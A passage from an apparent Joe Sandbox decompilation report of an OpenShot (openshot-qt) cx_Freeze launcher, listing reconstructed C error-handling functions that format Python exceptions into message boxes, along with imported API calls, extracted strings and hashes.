                                                                    					 *((intOrPtr*)(__eax + 0xc)) = _t49;
                                                                    					_t50 = _v20;
                                                                    					if(_t50 != 0) {
                                                                    						goto L3;
                                                                    					} else {
                                                                    						goto L10;
                                                                    					}
                                                                    					goto L15;
                                                                    				} else {
                                                                    					 *_t48 =  *_t48 + 1;
                                                                    					 *((intOrPtr*)(__eax + 0xc)) = _t48;
                                                                    					_t50 = _v20;
                                                                    					if(_t50 == 0) {
                                                                    						L10:
                                                                    						_t71 = __imp___Py_NoneStruct;
                                                                    						 *_t71 =  *_t71 + 1;
                                                                    						_t73[0x10] = _t71;
                                                                    						_t51 = _v16;
                                                                    						if(_t51 != 0) {
                                                                    							goto L4;
                                                                    						} else {
                                                                    							goto L9;
                                                                    						}
                                                                    						L15:
                                                                    						_v40 = "format_exception";
                                                                    						 *_t89 = _t51;
                                                                    						L00302078();
                                                                    						if(_t51 == 0) {
                                                                    							return E00301600(_v20, "Cannot get format_exception method.");
                                                                    						}
                                                                    						_v40 = _t73;
                                                                    						 *_t89 = _t51;
                                                                    						L00302080();
                                                                    						_t74 = _t51;
                                                                    						if(_t51 == 0) {
                                                                    							return E00301600(_v20, "Exception raised when calling format_exception.");
                                                                    						}
                                                                    						_v36 = 0;
                                                                    						_v40 = 0;
                                                                    						 *_t89 = 0x30a2fc;
                                                                    						L00302048();
                                                                    						if(_t51 == 0) {
                                                                    							return E00301600(_v20, "Cannot create empty string object.");
                                                                    						}
                                                                    						_v40 = _t74;
                                                                    						 *_t89 = _t51;
                                                                    						L00302030();
                                                                    						_t75 = _t51;
                                                                    						if(_t51 == 0) {
                                                                    							return E00301600(_v20, "Cannot join exception strings.");
                                                                    						}
                                                                    						_t62 = _v20;
                                                                    						_v40 = "caption";
                                                                    						 *_t89 = _t62;
                                                                    						L00302078();
                                                                    						if(_t62 == 0 || ( *(_t62[4] + 0x57) & 0x00000010) == 0) {
                                                                    							L003020C0();
                                                                    							_v36 = 0;
                                                                    							_v40 = 0x26;
                                                                    							 *_t89 = "cx_Freeze: Python error in main script";
                                                                    							L00302048();
                                                                    							if(_t62 == 0) {
                                                                    								return E00301600(_v20, "Cannot create default caption string.");
                                                                    							}
                                                                    						}
                                                                    						_t88 = _t62[0x14];
                                                                    						if(_t88 == 0) {
                                                                    							 *_t89 = _t62;
                                                                    							L00302050();
                                                                    							_t88 = _t62;
                                                                    						}
                                                                    						_t65 = _t75[0x14];
                                                                    						if(_t65 == 0) {
                                                                    							 *_t89 = _t75;
                                                                    							L00302050();
                                                                    						}
                                                                    						_v36 = _t88;
                                                                    						_v32 = 0x10;
                                                                    						_v40 = _t65;
                                                                    						 *_t89 = 0;
                                                                    						MessageBoxW(??, ??, ??, ??);
                                                                    						return 0xffffffff;
                                                                    					} else {
                                                                    						L3:
                                                                    						 *_t50 =  *_t50 + 1;
                                                                    						_t73[0x10] = _t50;
                                                                    						_t51 = _v16;
                                                                    						if(_t51 == 0) {
                                                                    							L9:
                                                                    							_t51 = __imp___Py_NoneStruct;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				L4:
                                                                    				 *_t51 =  *_t51 + 1;
                                                                    				_t73[0x14] = _t51;
                                                                    				 *_t89 = "excepthook";
                                                                    				L00302068();
                                                                    				 *_t89 = "__excepthook__";
                                                                    				_t87 = _t51;
                                                                    				L00302068();
                                                                    				if(_t87 != 0 && _t87 != _t51) {
                                                                    					_v40 = _t73;
                                                                    					 *_t89 = _t87;
                                                                    					L00302080();
                                                                    					if(_t51 != 0) {
                                                                    						return 0xffffffff;
                                                                    					}
                                                                    					return E00301600(_v20, "Error in sys.excepthook.");
                                                                    				}
                                                                    				 *_t89 = "traceback";
                                                                    				L00302098();
                                                                    				if(_t51 == 0) {
                                                                    					return E00301600(_v20, "Cannot import traceback module.");
                                                                    				}
                                                                    				goto L15;
                                                                    			}

























                                                                    0x00301a93
                                                                    0x00301a96
                                                                    0x00301a9a
                                                                    0x00301a9e
                                                                    0x00301aa2
                                                                    0x00301aa6
                                                                    0x00301aaa
                                                                    0x00301aad
                                                                    0x00301ab2
                                                                    0x00301ab6
                                                                    0x00301aba
                                                                    0x00301abd
                                                                    0x00301ac2
                                                                    0x00301ac9
                                                                    0x00301ad0
                                                                    0x00000000
                                                                    0x00301ca9
                                                                    0x00301ad6
                                                                    0x00301ad8
                                                                    0x00301ade
                                                                    0x00301b78
                                                                    0x00301b7d
                                                                    0x00301b80
                                                                    0x00301b83
                                                                    0x00301b89
                                                                    0x00000000
                                                                    0x00301b8f
                                                                    0x00000000
                                                                    0x00301b8f
                                                                    0x00000000
                                                                    0x00301ae4
                                                                    0x00301ae4
                                                                    0x00301ae7
                                                                    0x00301aea
                                                                    0x00301af0
                                                                    0x00301b60
                                                                    0x00301b60
                                                                    0x00301b65
                                                                    0x00301b68
                                                                    0x00301b6b
                                                                    0x00301b71
                                                                    0x00000000
                                                                    0x00301b73
                                                                    0x00000000
                                                                    0x00301b73
                                                                    0x00301bac
                                                                    0x00301bac
                                                                    0x00301bb4
                                                                    0x00301bb7
                                                                    0x00301bbe
                                                                    0x00000000
                                                                    0x00301cd9
                                                                    0x00301bc4
                                                                    0x00301bc8
                                                                    0x00301bcb
                                                                    0x00301bd0
                                                                    0x00301bd4
                                                                    0x00000000
                                                                    0x00301cf1
                                                                    0x00301bda
                                                                    0x00301be2
                                                                    0x00301bea
                                                                    0x00301bf1
                                                                    0x00301bf8
                                                                    0x00000000
                                                                    0x00301d21
                                                                    0x00301bfe
                                                                    0x00301c02
                                                                    0x00301c05
                                                                    0x00301c0a
                                                                    0x00301c0e
                                                                    0x00000000
                                                                    0x00301d09
                                                                    0x00301c14
                                                                    0x00301c18
                                                                    0x00301c20
                                                                    0x00301c23
                                                                    0x00301c2a
                                                                    0x00301c35
                                                                    0x00301c3a
                                                                    0x00301c42
                                                                    0x00301c4a
                                                                    0x00301c51
                                                                    0x00301c58
                                                                    0x00000000
                                                                    0x00301d68
                                                                    0x00301c58
                                                                    0x00301c5e
                                                                    0x00301c63
                                                                    0x00301d50
                                                                    0x00301d53
                                                                    0x00301d58
                                                                    0x00301d58
                                                                    0x00301c69
                                                                    0x00301c6e
                                                                    0x00301d40
                                                                    0x00301d43
                                                                    0x00301d43
                                                                    0x00301c74
                                                                    0x00301c78
                                                                    0x00301c80
                                                                    0x00301c84
                                                                    0x00301c8b
                                                                    0x00301c9f
                                                                    0x00301af2
                                                                    0x00301af2
                                                                    0x00301af2
                                                                    0x00301af5
                                                                    0x00301af8
                                                                    0x00301afe
                                                                    0x00301b58
                                                                    0x00301b58
                                                                    0x00301b58
                                                                    0x00301afe
                                                                    0x00301af0
                                                                    0x00301b00
                                                                    0x00301b00
                                                                    0x00301b03
                                                                    0x00301b06
                                                                    0x00301b0d
                                                                    0x00301b12
                                                                    0x00301b19
                                                                    0x00301b1b
                                                                    0x00301b22
                                                                    0x00301b28
                                                                    0x00301b2c
                                                                    0x00301b2f
                                                                    0x00301b36
                                                                    0x00000000
                                                                    0x00301d30
                                                                    0x00000000
                                                                    0x00301b45
                                                                    0x00301b98
                                                                    0x00301b9f
                                                                    0x00301ba6
                                                                    0x00000000
                                                                    0x00301cc1
                                                                    0x00000000

                                                                    APIs
                                                                    • PyErr_Fetch.LIBPYTHON3.8 ref: 00301AAD
                                                                    • PyErr_NormalizeException.LIBPYTHON3.8 ref: 00301ABD
                                                                    • PyTuple_New.LIBPYTHON3.8 ref: 00301AC9
                                                                    • PySys_GetObject.LIBPYTHON3.8 ref: 00301B0D
                                                                    • PySys_GetObject.LIBPYTHON3.8 ref: 00301B1B
                                                                    • PyObject_CallObject.LIBPYTHON3.8 ref: 00301B2F
                                                                    Strings
                                                                    • __excepthook__, xrefs: 00301B12
                                                                    • Cannot import traceback module., xrefs: 00301CBC
                                                                    • Cannot create args tuple., xrefs: 00301CA4
                                                                    • format_exception, xrefs: 00301BAC
                                                                    • excepthook, xrefs: 00301B06
                                                                    • Error in sys.excepthook., xrefs: 00301B40
                                                                    • Cannot create empty string object., xrefs: 00301D1C
                                                                    • caption, xrefs: 00301C18
                                                                    • Exception raised when calling format_exception., xrefs: 00301CEC
                                                                    • Cannot create default caption string., xrefs: 00301D63
                                                                    • traceback, xrefs: 00301B98
                                                                    • Cannot get format_exception method., xrefs: 00301CD4
                                                                    • &, xrefs: 00301C42
                                                                    • Cannot join exception strings., xrefs: 00301D04
                                                                    • cx_Freeze: Python error in main script, xrefs: 00301C4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: Object.$Err_Sys_$CallException.Fetch.New.NormalizeObject_Tuple_
                                                                    • String ID: &$Cannot create args tuple.$Cannot create default caption string.$Cannot create empty string object.$Cannot get format_exception method.$Cannot import traceback module.$Cannot join exception strings.$Error in sys.excepthook.$Exception raised when calling format_exception.$__excepthook__$caption$cx_Freeze: Python error in main script$excepthook$format_exception$traceback
                                                                    • API String ID: 1420272106-415695568
                                                                    • Opcode ID: 1cda8e1d41d2edeefcf4db93385ed3ee46f049f9da02e2fe48c6e950b0900a0b
                                                                    • Instruction ID: 45c4b94fb21416a71b572abb25df5c02d5666e51c164087ca629914d278d8bfd
                                                                    • Opcode Fuzzy Hash: 1cda8e1d41d2edeefcf4db93385ed3ee46f049f9da02e2fe48c6e950b0900a0b
                                                                    • Instruction Fuzzy Hash: B8613DB460A7018BD713EF65D4A421BBBE8AF44790F05882DF8848B6D1E775C845DB93
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • PyErr_Fetch.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,00301CAE), ref: 00301622
                                                                    • PyErr_NormalizeException.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,00301CAE), ref: 00301636
                                                                    • strlen.MSVCRT ref: 0030163E
                                                                    • PyUnicode_DecodeASCII.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00301652
                                                                    • PyUnicode_DecodeASCII.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00301678
                                                                    • PyTuple_New.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0030168E
                                                                    • PyUnicode_Format.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 003016C8
                                                                    • PyUnicode_DecodeASCII.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 003016EE
                                                                    • MessageBoxW.USER32 ref: 00301728
                                                                    • MessageBoxA.USER32 ref: 003017CF
                                                                    • Py_Finalize.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00301CAE), ref: 003017D8
                                                                    • MessageBoxA.USER32 ref: 0030180F
                                                                    • Py_Finalize.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00301CAE), ref: 00301818
                                                                    • MessageBoxA.USER32 ref: 003018AF
                                                                    • Py_Finalize.LIBPYTHON3.8(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00301CAE), ref: 003018B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: MessageUnicode_$DecodeFinalize.$Err_$Exception.Fetch.Format.New.NormalizeTuple_strlen
                                                                    • String ID: %sException: %sOriginal Exception: %s$>$Cannot create caption string object.$Cannot create context message string object.$Cannot create format args tuple.$Cannot create format string object.$Cannot format exception values.$cx_Freeze Fatal Error$cx_Freeze: Python error in main script (traceback unavailable)
                                                                    • API String ID: 2722238361-2232956362
                                                                    • Opcode ID: 29f9f2d704fd0cebad52ff5566ca030ed32ecb2575852fc7fcfb68f49ce6db60
                                                                    • Instruction ID: 084f860c196f1dee57703056fe39333f5acddcab057ac2db999b496e6663190f
                                                                    • Opcode Fuzzy Hash: 29f9f2d704fd0cebad52ff5566ca030ed32ecb2575852fc7fcfb68f49ce6db60
                                                                    • Instruction Fuzzy Hash: D85158B550A3019FD302AF68E4A831FBBE4EF84754F01C91DE4D88B291D7B58889DB93
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • PyErr_Fetch.LIBPYTHON3.8 ref: 003018ED
                                                                    • PyErr_NormalizeException.LIBPYTHON3.8 ref: 003018FD
                                                                    • PyObject_GetAttrString.LIBPYTHON3.8(?,?,00000000,00000001,00301FF5), ref: 00301911
                                                                    • PyObject_GetAttrString.LIBPYTHON3.8(?,?,00000000,00000001,00301FF5), ref: 0030193C
                                                                    • PyObject_Str.LIBPYTHON3.8(?,?,00000000,00000001,00301FF5), ref: 00301969
                                                                    • MessageBoxA.USER32 ref: 00301997
                                                                    • Py_Finalize.LIBPYTHON3.8 ref: 003019A0
                                                                    • PyErr_Clear.LIBPYTHON3.8(?,?,00000000,00000001,00301FF5), ref: 003019B8
                                                                    • PyUnicode_DecodeASCII.LIBPYTHON3.8(?,?,00000000,00000001,00301FF5), ref: 003019D4
                                                                    • MessageBoxA.USER32 ref: 00301A02
                                                                    • Py_Finalize.LIBPYTHON3.8 ref: 00301A0B
                                                                    • PyErr_Clear.LIBPYTHON3.8(?,?,00000000,00000001,00301FF5), ref: 00301A18
                                                                    • MessageBoxW.USER32 ref: 00301A4B
                                                                    • Py_Exit.LIBPYTHON3.8(?,?,00000000,00000001,00301FF5), ref: 00301A5C
                                                                    • PyLong_AsLong.LIBPYTHON3.8(?,?,00000000,00000001,00301FF5), ref: 00301A61
                                                                    • Py_Exit.LIBPYTHON3.8(?,?,00000000,00000001,00301FF5), ref: 00301A6F
                                                                    • PyUnicode_AsUnicode.LIBPYTHON3.8(?,?,00000000,00000001,00301FF5), ref: 00301A77
                                                                    • PyUnicode_AsUnicode.LIBPYTHON3.8(?,?,00000000,00000001,00301FF5), ref: 00301A81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: Err_$MessageObject_Unicode_$AttrClear.Exit.Finalize.String.Unicode.$DecodeException.Fetch.Long.Long_NormalizeStr.
                                                                    • String ID: !$Cannot create caption string object.$Cannot get string representation of messsage.$caption$code$cx_Freeze Fatal Error$cx_Freeze: Application Terminated
                                                                    • API String ID: 1810310496-1944713704
                                                                    • Opcode ID: ae96c86f014efa85924adfb405030971175c2da58ccde05da97409f3226412f5
                                                                    • Instruction ID: 2f7bcca75325b90c28facbcef742102823dcde6a095c3e6b1da35d2aed4c9535
                                                                    • Opcode Fuzzy Hash: ae96c86f014efa85924adfb405030971175c2da58ccde05da97409f3226412f5
                                                                    • Instruction Fuzzy Hash: F7410BB060A7019FD712AF68D5A931FBBE4AF84744F118D1DE4D88B292D7B5C488CB93
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 96%
                                                                    			E00301B91(void* __ebx, char* _a4, char* _a8, void* _a12, char _a24) {
                                                                    				void* _t25;
                                                                    
                                                                    				 *__esp = "traceback";
                                                                    				L00302098();
                                                                    				if(__eax == 0) {
                                                                    					__eax = _a24;
                                                                    					__edx = "Cannot import traceback module.";
                                                                    					__eax = E00301600(_a24, "Cannot import traceback module.");
                                                                    					goto L1;
                                                                    				} else {
                                                                    					_a4 = "format_exception";
                                                                    					 *__esp = __eax;
                                                                    					L00302078();
                                                                    					if(__eax == 0) {
                                                                    						__eax = _a24;
                                                                    						__edx = "Cannot get format_exception method.";
                                                                    						__eax = E00301600(_a24, "Cannot get format_exception method.");
                                                                    						goto L1;
                                                                    					} else {
                                                                    						_a4 = __ebx;
                                                                    						 *__esp = __eax;
                                                                    						L00302080();
                                                                    						__ebx = __eax;
                                                                    						if(__eax == 0) {
                                                                    							__eax = _a24;
                                                                    							__edx = "Exception raised when calling format_exception.";
                                                                    							__eax = E00301600(_a24, "Exception raised when calling format_exception.");
                                                                    							goto L1;
                                                                    						} else {
                                                                    							_a8 = 0;
                                                                    							_a4 = 0;
                                                                    							 *__esp = 0x30a2fc;
                                                                    							L00302048();
                                                                    							if(__eax == 0) {
                                                                    								__eax = _a24;
                                                                    								__edx = "Cannot create empty string object.";
                                                                    								__eax = E00301600(_a24, "Cannot create empty string object.");
                                                                    								goto L1;
                                                                    							} else {
                                                                    								_a4 = __ebx;
                                                                    								 *__esp = __eax;
                                                                    								L00302030();
                                                                    								__ebx = __eax;
                                                                    								if(__eax == 0) {
                                                                    									__eax = _a24;
                                                                    									__edx = "Cannot join exception strings.";
                                                                    									__eax = E00301600(_a24, "Cannot join exception strings.");
                                                                    									goto L1;
                                                                    								} else {
                                                                    									__eax = _a24;
                                                                    									_a4 = "caption";
                                                                    									 *__esp = __eax;
                                                                    									L00302078();
                                                                    									if(__eax == 0) {
                                                                    										L9:
                                                                    										L003020C0();
                                                                    										_a8 = 0;
                                                                    										_a4 = 0x26;
                                                                    										 *__esp = "cx_Freeze: Python error in main script";
                                                                    										L00302048();
                                                                    										if(__eax == 0) {
                                                                    											__eax = _a24;
                                                                    											__edx = "Cannot create default caption string.";
                                                                    											__eax = E00301600(_a24, "Cannot create default caption string.");
                                                                    											L1:
                                                                    											return _t25;
                                                                    										} else {
                                                                    											goto L10;
                                                                    										}
                                                                    									} else {
                                                                    										__edx =  *(__eax + 4);
                                                                    										if((( *(__eax + 4))[0x57] & 0x00000010) != 0) {
                                                                    											L10:
                                                                    											__esi =  *(__eax + 0x14);
                                                                    											if(__esi == 0) {
                                                                    												 *__esp = __eax;
                                                                    												L00302050();
                                                                    												__esi = __eax;
                                                                    											}
                                                                    											__eax = __ebx[0x14];
                                                                    											if(__eax == 0) {
                                                                    												 *__esp = __ebx;
                                                                    												L00302050();
                                                                    											}
                                                                    											__eax = 0xffffffff;
                                                                    											__esp = __esp - 0x10;
                                                                    											__esp =  &(__esp[8]);
                                                                    											_pop(__ebx);
                                                                    											_pop(__esi);
                                                                    											return 0xffffffff;
                                                                    										} else {
                                                                    											goto L9;
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    			}




                                                                    0x00301b98
                                                                    0x00301b9f
                                                                    0x00301ba6
                                                                    0x00301cb8
                                                                    0x00301cbc
                                                                    0x00301cc1
                                                                    0x00000000
                                                                    0x00301bac
                                                                    0x00301bac
                                                                    0x00301bb4
                                                                    0x00301bb7
                                                                    0x00301bbe
                                                                    0x00301cd0
                                                                    0x00301cd4
                                                                    0x00301cd9
                                                                    0x00000000
                                                                    0x00301bc4
                                                                    0x00301bc4
                                                                    0x00301bc8
                                                                    0x00301bcb
                                                                    0x00301bd0
                                                                    0x00301bd4
                                                                    0x00301ce8
                                                                    0x00301cec
                                                                    0x00301cf1
                                                                    0x00000000
                                                                    0x00301bda
                                                                    0x00301bda
                                                                    0x00301be2
                                                                    0x00301bea
                                                                    0x00301bf1
                                                                    0x00301bf8
                                                                    0x00301d18
                                                                    0x00301d1c
                                                                    0x00301d21
                                                                    0x00000000
                                                                    0x00301bfe
                                                                    0x00301bfe
                                                                    0x00301c02
                                                                    0x00301c05
                                                                    0x00301c0a
                                                                    0x00301c0e
                                                                    0x00301d00
                                                                    0x00301d04
                                                                    0x00301d09
                                                                    0x00000000
                                                                    0x00301c14
                                                                    0x00301c14
                                                                    0x00301c18
                                                                    0x00301c20
                                                                    0x00301c23
                                                                    0x00301c2a
                                                                    0x00301c35
                                                                    0x00301c35
                                                                    0x00301c3a
                                                                    0x00301c42
                                                                    0x00301c4a
                                                                    0x00301c51
                                                                    0x00301c58
                                                                    0x00301d5f
                                                                    0x00301d63
                                                                    0x00301d68
                                                                    0x00301b4a
                                                                    0x00301b50
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00301c2c
                                                                    0x00301c2c
                                                                    0x00301c33
                                                                    0x00301c5e
                                                                    0x00301c5e
                                                                    0x00301c63
                                                                    0x00301d50
                                                                    0x00301d53
                                                                    0x00301d58
                                                                    0x00301d58
                                                                    0x00301c69
                                                                    0x00301c6e
                                                                    0x00301d40
                                                                    0x00301d43
                                                                    0x00301d43
                                                                    0x00301c91
                                                                    0x00301c96
                                                                    0x00301c99
                                                                    0x00301c9c
                                                                    0x00301c9d
                                                                    0x00301c9f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00301c33
                                                                    0x00301c2a
                                                                    0x00301c0e
                                                                    0x00301bf8
                                                                    0x00301bd4
                                                                    0x00301bbe

                                                                    APIs
                                                                    • PyImport_ImportModule.LIBPYTHON3.8 ref: 00301B9F
                                                                    • PyObject_GetAttrString.LIBPYTHON3.8(?,?,00000000,00000001,00301FA0), ref: 00301BB7
                                                                    • PyObject_CallObject.LIBPYTHON3.8(?,?,00000000,00000001,00301FA0), ref: 00301BCB
                                                                    • PyUnicode_DecodeASCII.LIBPYTHON3.8(?,?,00000000,00000001,00301FA0), ref: 00301BF1
                                                                    • PyUnicode_Join.LIBPYTHON3.8(?,?,00000000,00000001,00301FA0), ref: 00301C05
                                                                    • PyObject_GetAttrString.LIBPYTHON3.8(?,?,00000000,00000001,00301FA0), ref: 00301C23
                                                                    • PyErr_Clear.LIBPYTHON3.8(?,?,00000000,00000001,00301FA0), ref: 00301C35
                                                                    • PyUnicode_DecodeASCII.LIBPYTHON3.8(?,?,00000000,00000001,00301FA0), ref: 00301C51
                                                                    • MessageBoxW.USER32 ref: 00301C8B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: Object_Unicode_$AttrDecodeString.$CallClear.Err_ImportImport_Join.MessageModule.Object.
                                                                    • String ID: &$caption$cx_Freeze: Python error in main script$format_exception$traceback
                                                                    • API String ID: 4163519114-2246336407
                                                                    • Opcode ID: b8cc3ffe5db7c04d894c35888d8c6fb399a3bfbb9d2f6aff5ba85a4f085027a5
                                                                    • Instruction ID: eec9912599e70e990576aa3ea4cffb87111473d72415a979dfd199d1be2d962a
                                                                    • Opcode Fuzzy Hash: b8cc3ffe5db7c04d894c35888d8c6fb399a3bfbb9d2f6aff5ba85a4f085027a5
                                                                    • Instruction Fuzzy Hash: 5D21EDB0A0B7019BE712AF75D56832BBBE4AF44744F068C2DE8D88B2D1D775C844DB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    • VirtualQuery failed for %d bytes at address %p, xrefs: 00302517
                                                                    • VirtualProtect failed with code 0x%x, xrefs: 003024E6
                                                                    • Mingw-w64 runtime failure:, xrefs: 003023A8
                                                                    • Address %p has no image-section, xrefs: 0030252B
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: QueryVirtualabortfwritevfprintf
                                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                    • API String ID: 2513968241-1534286854
                                                                    • Opcode ID: c16e3bbd3350f1885427df271de86a5de704bcffd21d659c45092a5c0e805e62
                                                                    • Instruction ID: 34da6c5efbb7e6bdc89654e2e176a54723aaed265aa3b12113bd9e647b4f517c
                                                                    • Opcode Fuzzy Hash: c16e3bbd3350f1885427df271de86a5de704bcffd21d659c45092a5c0e805e62
                                                                    • Instruction Fuzzy Hash: 72518BB59067018FC712EF29D89965BFBE4FF84314F41C92DE8888B295E734E844CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %*.*s$%-*.*s$%.*s
                                                                    • API String ID: 0-4054516066
                                                                    • Opcode ID: 66dfb617903a468a1dbf5f24df591c3d01e776b5c569dc04001e31ccbbc7db16
                                                                    • Instruction ID: 0e19f983d275f1e62af2b462fafc14596f76a9d99d1af49ec8d1876698520ec0
                                                                    • Opcode Fuzzy Hash: 66dfb617903a468a1dbf5f24df591c3d01e776b5c569dc04001e31ccbbc7db16
                                                                    • Instruction Fuzzy Hash: 6541ADB16063049BCB128F28C4E4265B7E9BF85714F26C66DE8898F7DAD736DD40CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 16%
                                                                    			E003019B1(CHAR* _a4, struct HWND__* _a8, int _a12, struct HWND__* _a24) {
                                                                    				struct HWND__* _t22;
                                                                    				struct HWND__* _t26;
